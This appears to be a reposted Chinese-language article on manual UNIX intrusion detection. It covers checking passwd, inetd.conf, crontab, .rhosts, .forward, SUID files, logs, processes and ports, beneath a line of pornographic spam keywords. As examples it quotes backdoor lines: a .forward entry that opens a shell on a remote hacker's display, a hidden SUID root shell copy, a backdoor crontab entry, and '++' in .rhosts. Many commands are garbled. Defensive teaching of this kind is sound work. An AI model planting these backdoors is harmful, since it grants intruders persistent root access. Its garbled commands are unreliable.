亚洲成精品动漫久久精久,九九在线精品视频播放,黄色成人免费观看,三级成人影院,久碰久,四虎成人欧美精品在永久在线

掃一掃
關注微信公眾號

UNIX常用手工入侵檢測方法與命令
2007-10-08   網絡

一個好的網管員不但要管理好網絡,能及時排除各種故障,還要注意網絡安全,提防黑客入侵。所以熟悉常用手工入侵檢測的方法和命令也應該是網管員們的基本技能之一。本文介紹的是一些UNIX下常用手工入侵檢測方法與命令,網管員們掌握了它們不但可以迅速判斷出一些簡單的黑客入侵,還可以加深對入侵檢測的了解,從而能更好地使用一些入侵檢測和審計工具。

1.檢查/etc/passwd文件中是否有可疑用戶

UNIX中/etc/passwd文件是存儲系統用戶口令等重要信息的文件,黑客入侵系統后往往會使用在passwd文件中增加特權用戶的方法為自己留個后門。所以我們要經常查看,如果系統中用戶較少,可以采用直接查看passwd文件的方法,命令如下:

$cat/etc/passwd

如果系統中有成百上千個用戶,那直接查看就不行了,不過我們只要檢測其中是否有UID為O的特權用戶就行了,這時可以使用以下命令來實現:

$awk-F:‘$3==0{print$1}’/etc/passwd

如果還想看看是否有空口令用戶,那可以用如下命令:

$awk-F:‘length(S2)==0{print$1}’/etc/shadow

當然網管員不可能每天都去查看passwd文件,我們可以編寫一個如下的腳本程序,并將其放)入/etc/cron.daily文件中,讓它每天檢測passwd文件中的所有UID和GID為O的用戶,然后把清單寄給root,這樣網管員只要每天收看一下信件就行了。具體腳本如下:

$grep‘0:0’/etc/passwd|awk‘BEGIN{FS=“:”)\{print$1)’|mail-s“‘date+”%d%f“‘”root

2.檢查,etc/inet.conf和crontab文件是否被修改

Inet.conf是系統守護進程的配置文件,里面的服務會隨系統的啟動而啟動,如系統開放了Telent服務,inet.conf文件中就會有這樣一個語句:

telnet stream tcp nowmt root/usr/sbin/in.telnetd in.telnetd

從左到右依次表示的是:服務名稱、套接口類型、協議類型、運行動作、進程所屬用戶、守護進程路徑名、守護進程名字及參數。黑客會通過替換或增加其中的服務來運行他的后門,網管員應該對/etc/inetd.conf中的內容比較熟悉,然后用如下命令列出其中的所有服務:

$ls-1/etc/inetd.conf

再一一查看是否有可疑服務、服務名與其對應的程序是否一致。

同樣/etc/crontab文件是Cron服務的配置文件,Cron用于計劃程序在特定時間運行的服務,系統的crontab文件在/etc/中,root用戶的crontab文件在/var/spool/crontab/root中,其具體格式如下:

00** 3/usr/bin/backdoor

從左到右依次表示的是:分鐘、小時、日、月、星期、所要運行的程序。像上面這個例子就是用戶在每天的午夜零點運行backdoor程序,而這個backdoor程序如果是黑客程序會怎樣呢?所以網管員也要經常用cat命令查看其crontab文件,看是否有黑客混入。

3.檢查.rhosts、/etc/hosts.equiv、forward文件是否被修改

這幾個文件是常被黑客利用來安裝后門的文件。如果系統開了像Rlogin,Rsh或Rexec等R類服務,那么就必須檢查.rhosts,/etc/hosts.equiv這兩個文件了,因為像Rsh和Rlogin這樣的服務是基于rhosts文件里的主機名使用簡單的認證方法,黑客只要向可以訪問的某用戶的rhosts文件中輸入“++”,那就允許任何人從任何地方無需口令使用這個賬號從513端口的Rlogin服務登錄您的機子。而且,像Rsh服務缺少日志能力,更加不容易被發現,.hosts.equiv文件也類似。管理員們可以用如下命令檢查這兩個文件:

$find/-name“rhosts”-print|grep‘++’

cat/etc/hosts.equiv

不過實際上黑客只要將.rhosts文件設置成允許來自網上的某一個賬號的主機名和用戶名登錄就行,所以管理員們最好能借助審計工具更仔細檢查這些文件。

還有一個.forward文件。在.forward文件里放入命令是UNIX中黑客重新獲得訪問的常用方法。像用戶usemame的.forward文件的home文件夾中,黑客會把.forward設置如下:

\username|“/usr/local/X11/bin/xterm-disp hacksys.other.dom:0.0-e/bin/sh”

這種方法的變形包括改變系統的mail的別名文件、從.forward中運行簡單腳本實現在標準輸入執行等。所以網管員們也要經常檢查.forward文件

4.檢查是否有危險的Root Suid程序

Root Suid程序更是黑客在UNIX系統留后門的一種常見方法,黑客通過種種方法取得了root權限后,他便會復制一份root shell,并將它設置Suid(set uid)位,然后保存在隱蔽的文件夾中:

#cp/bin/sh/tmp/.backdoor

#chmodU+S/tmp/.backdoor

下次黑客以一般用戶登錄后,只要運行這個.backdoor就又能獲得root權限了。要發現它比較簡單,網管員們可以用以下命令:

#find/-typef(-perm-4000-o-perm-2000)-print

5.檢查系統日志

UNIX的日志可以說是比較健全的,它記錄了用戶登錄、操作及系統事件等等許多東西。 UNIX系統日志文件通常是存放在/var/log和/var/adm目錄下,但每個UNIX版本不同存放日志的具體地方可能不同,大家可以通過查看/etc/syslog.conf知道日志配置的具體情況。具體的日志文件有lastlog、utmp、wtmp、syslog、sulog等,它們記錄的分別是不同的事件,通過查看這些日志可以獲得一些黑客入侵的“蛛絲馬跡”,當然前提是日志沒有被黑客動過手腳。

如像lastlog記錄的是所有用戶的最近登錄時間和訪問時的網絡地址,我們想查看最近30次登錄的用戶和他們的地址,可以用如下命令:

last-30

utmp則記錄的是當前登錄到系統的用戶信息,我們可以用who命令來查看。wtmp記錄的是記錄歷史的login和logout信息,可以用last命令訪問。而syslog記錄的是各種程序產生的日志,sulog記錄的是用戶用su命令轉變為另一用戶的信息。

6.檢查是否有可疑進程

百分之九十的后門和木馬都是以進程形式存在的,所以查看是否有可疑進程很重要,這就要求網管員對各個進程非常熟悉才行。當然重點是查看Unix系統的inetd守護進程,原因我們前面說了因為inetd守護進程的程序隨系統啟動而啟動,所以黑客后門程序通常加在inet.conf中。可以用以下命令查看其進程:

#ps-aef|grep inetd

當然inetd很多,如何能看出可疑進程呢?首先正常的inetd的pid比較靠前,其次Unix系統中沒有用inetd去啟動某個文件的情況,如果用ps命令看到了類似于inetd -s/tmp/.backdoor的啟動進程時就要注意了!如果不是網管員自己加的,那就說明有人已經侵入系統了。

7.檢查網絡連接和開放端口

黑客所留的后門中有一些會開啟系統新的端口進行監聽,等待黑客連接。最簡單常見的就是將一個加密root shell綁定在高位端口上。所以網管員們應該經常查看網絡連接狀態,看看是否有可疑連接和可疑端口,此類常用命令如下。

(1)查看網卡設置:#ifconfig-a:

(2)查看本機的路由、網關設置情況:#netstat-m;

(3)查看本機所有的網絡連接:#netstat-an:

(4)查看本機所有開放的端口:%netstat-an|grep listen。

以上介紹的是一些簡單的入侵檢測原理和方法。正如我們看到的,手工入侵檢測相當繁瑣,很難進行深層次的檢測,而且這些檢測大多基于系統命令,如果系統文件已經被黑客替換的話,就不可能進行準確的檢測。要正確有效地進行入侵檢測和審計需要借助于一些入侵分析工具。本文介紹這些方法的目的也不是為了提倡大家手工檢測入侵、排斥入侵審計工具,而是讓大家對入侵檢測原理有個最基本的了解,使網管員們能更正確有效地使用入侵分析工具。

熱詞搜索:

上一篇:網絡中其他DHCP服務器干擾IP地址分配
下一篇:“自動重啟”的服務器(下)

分享到: 收藏